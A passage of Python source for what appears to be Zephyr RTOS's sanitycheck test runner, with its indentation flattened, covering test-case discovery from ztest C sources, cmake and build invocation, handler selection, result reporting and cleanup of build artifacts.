@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
            # Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
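# Added commentary, not part of the original file: TestCase.scan_file() extracts
# ztest subcase names from C sources. For example, a hypothetical source line
#
#   ztest_unit_test(test_mutex_lock)
#
# is matched by stc_regex and recorded as the subcase "mutex_lock", because the
# leading "test_" prefix is stripped before the names are returned.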
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
self.suite.build_filtered_tests += 1
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
else:
ldflags = cflags = aflags = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
            f'-DEXTRA_AFLAGS="{aflags}"',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
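# Added commentary, not part of the original file: run_cmake() above assembles a
# command line roughly equivalent to the following (hypothetical paths and board):
#
#   cmake -B<build_dir> -S<source_dir> -DEXTRA_CFLAGS="-Werror" \
#         -DEXTRA_AFLAGS="-Wa,--fatal-warnings" -DEXTRA_LDFLAGS="-Wl,--fatal-warnings" \
#         -G<generator> -DBOARD=<board>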
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.pid_fn = os.path.join(instance.build_dir, "mdb.pid")
instance.handler.call_west_flash = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
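# Overview of the message pipeline driven by process() below (summary added for
# clarity, inferred from the op handlers rather than from external docs):
#   "cmake"   -> report on failure/filter (or when cmake_only is set), else queue "build"
#   "build"   -> report on build failure, else queue "run" when the instance is runnable, else report
#   "run"     -> execute via the configured handler, then queue "report" with the handler's status
#   "report"  -> print/record results; queue "cleanup" for passed tests when self.cleanup is enabled
#   "cleanup" -> remove build artifacts (the device-testing variant keeps binaries and sanitizes paths)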
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process: call cmake and then build with the configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
self.suite.build_filtered_tests += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.status}")
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self):
total_tests_width = len(str(self.suite.total_to_do))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
self.suite.total_errors += 1
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if self.suite.total_to_do > 0:
completed_perc = int((float(self.suite.total_done) / self.suite.total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if self.suite.build_filtered_tests > 0 else Fore.RESET,
self.suite.build_filtered_tests,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan or self.ubsan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
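# A minimal, hypothetical usage sketch for BoundedExecutor (not part of the original
# sources): the `work` function and the numbers are made up. It only illustrates that
# submit() throttles itself once `bound` items are pending, because each submission
# acquires the semaphore that is released by the future's done-callback.
def _bounded_executor_usage_sketch():
    def work(n):
        return n * n
    # At most 2 threads run work(); at most 4 additional items wait in the queue,
    # so the comprehension below blocks instead of queueing all 20 items at once.
    with BoundedExecutor(bound=4, max_workers=2) as executor:
        futures = [executor.submit(work, i) for i in range(20)]
        return [f.result() for f in futures]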
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_size_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_skipped_cases = 0 # number of skipped test cases
self.total_to_do = 0 # number of test instances to be run
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.build_filtered_tests = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
# run integration tests only
self.integration = False
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self):
self.total_tests = len(self.instances)
self.total_cases = 0
self.total_skipped = 0
self.total_skipped_cases = 0
self.total_passed = 0
for instance in self.instances.values():
self.total_cases += len(instance.testcase.cases)
if instance.status == 'skipped':
self.total_skipped += 1
self.total_skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
self.total_passed += 1
for res in instance.results.values():
if res == 'SKIP':
self.total_skipped_cases += 1
self.total_to_do = self.total_tests - self.total_skipped
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
